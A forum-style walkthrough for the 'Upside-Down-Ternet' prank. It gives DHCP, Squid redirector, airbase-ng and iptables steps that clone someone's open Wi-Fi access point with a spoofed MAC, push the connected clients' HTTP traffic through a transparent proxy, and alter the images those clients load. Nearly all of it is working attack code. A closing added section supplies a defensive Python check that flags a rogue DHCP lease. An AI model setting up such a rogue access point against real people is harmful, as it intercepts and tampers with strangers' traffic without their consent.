This is an UPSIDE-DOWN-TERNET example.
The result will look something like this (YouTube).
Step 1.
Set up your dhcpd.conf
Code:
option domain-name-servers 208.67.222.220, 208.67.222.222; #OPENDNS, YOU CAN CHANGE THESE
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
    interface at0;
    range 10.0.0.100 10.0.0.254;
    option routers 10.0.0.1;
    option domain-name-servers 208.67.222.220, 208.67.222.222;
}
Step 2.
Edit and insert a little redirection script into your proxy server =)
This downloads all the images to the local Apache server and flips them; after
that they are served onwards to the client.
Code:
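#!/usr/bin/perl
# Squid redirector: reads one request per line on stdin and prints the URL to use.
$|=1;        # unbuffered output, so squid gets each answer immediately
$count = 0;
$pid = $$;   # process ID keeps file names unique per redirector instance
while (<>) {
    chomp $_;
    if ($_ =~ /(.*\.jpg)/i) {
        $url = $1;
        # list-form system() passes the URL as one argument, without a shell
        system("/usr/bin/wget", "-q", "-O", "/var/www/images/$pid-$count.jpg", "$url");
        system("/usr/bin/mogrify", "-flip", "/var/www/images/$pid-$count.jpg");
        system("chmod", "666", "/var/www/images/$pid-$count.jpg");
        # answer with the URL of the flipped local copy
        print "http://10.0.0.1/images/$pid-$count.jpg\n";
    }
    elsif ($_ =~ /(.*\.gif)/i) {
        $url = $1;
        system("/usr/bin/wget", "-q", "-O", "/var/www/images/$pid-$count.gif", "$url");
        system("/usr/bin/mogrify", "-flip", "/var/www/images/$pid-$count.gif");
        system("chmod", "666", "/var/www/images/$pid-$count.gif");
        print "http://10.0.0.1/images/$pid-$count.gif\n";
    }
    else {
        # anything that is not a .jpg or .gif is passed through unchanged
        print "$_\n";
    }
    $count++;
}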
Set up Apache.
Set up squid on your localhost as a transparent proxy.
Step 3.
Set up an AP clone for your previous open WLAN AP
Code:
airmon-ng start wlan0
ifconfig mon0 down
macchanger -r XX:XX:XX:XX:XX:XX mon0
ifconfig mon0 up
airbase-ng -W 0 -e ESSID -c 6 mon0
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
/etc/init.d/dhcp3-server restart
/etc/init.d/apache2 restart
/etc/init.d/squid restart
Step 4.
Configure iptables to route traffic through your proxy server, which is running on port 3128
Code:
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
echo 1 > /proc/sys/net/ipv4/conf/ppp0/forwarding
echo 1 > /proc/sys/net/ipv4/conf/wlan0/forwarding
echo 1 > /proc/sys/net/ipv4/conf/at0/forwarding
iptables --table nat --append POSTROUTING --out-interface ppp0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p udp -s 10.0.0.0/24 --dport 53 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp -m tcp -s 10.0.0.0/24 --dport 80 -j DNAT --to-destination 10.0.0.1:3128
Note: you may want to add your own rules to iptables.
Good luck =)
Credits to Pete.
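
Seen from the client side, the dhcpd.conf in Step 1 leaves a recognisable trace in the DHCP lease: a new gateway, outside DNS servers and a 60-second lease time. The following is an added example, not part of the original post, that parses a dhclient-style lease block and compares it with a recorded baseline; the baseline values are hypothetical and the sample lease is constructed from the Step 1 settings.

```python
import re

# Hypothetical known-good DHCP parameters recorded for the legitimate network.
BASELINE = {
    "routers": {"192.168.1.1"},
    "domain-name-servers": {"192.168.1.1"},
    "min_lease_seconds": 3600,
}

# Constructed dhclient lease block using the values from the dhcpd.conf in Step 1.
SAMPLE_LEASE = """\
lease {
  interface "wlan0";
  fixed-address 10.0.0.100;
  option subnet-mask 255.255.255.0;
  option routers 10.0.0.1;
  option dhcp-lease-time 60;
  option domain-name-servers 208.67.222.220,208.67.222.222;
  option dhcp-server-identifier 10.0.0.1;
}
"""

OPTION_RE = re.compile(r"^\s*option\s+([\w-]+)\s+([^;]+);", re.MULTILINE)

def parse_lease(text):
    """Return {option-name: [values]} for one dhclient lease block."""
    opts = {}
    for name, value in OPTION_RE.findall(text):
        opts[name] = [v.strip().strip('"') for v in value.split(",")]
    return opts

def audit_lease(text, baseline=BASELINE):
    """List the ways a lease deviates from the recorded baseline."""
    opts = parse_lease(text)
    findings = []
    routers = set(opts.get("routers", []))
    if routers - baseline["routers"]:
        findings.append("gateway changed: " + ", ".join(sorted(routers)))
    dns = set(opts.get("domain-name-servers", []))
    if dns - baseline["domain-name-servers"]:
        findings.append("DNS changed: " + ", ".join(sorted(dns)))
    lease = int(opts.get("dhcp-lease-time", ["0"])[0])
    if lease < baseline["min_lease_seconds"]:
        findings.append(f"lease time {lease}s below baseline")
    return findings

if __name__ == "__main__":
    for finding in audit_lease(SAMPLE_LEASE):
        print("ALERT:", finding)
```

A changed gateway or DNS server on a familiar SSID is also a cue to compare the BSSID and to keep traffic off plain HTTP, which is the only traffic the port 80 rule in Step 4 hands to the proxy.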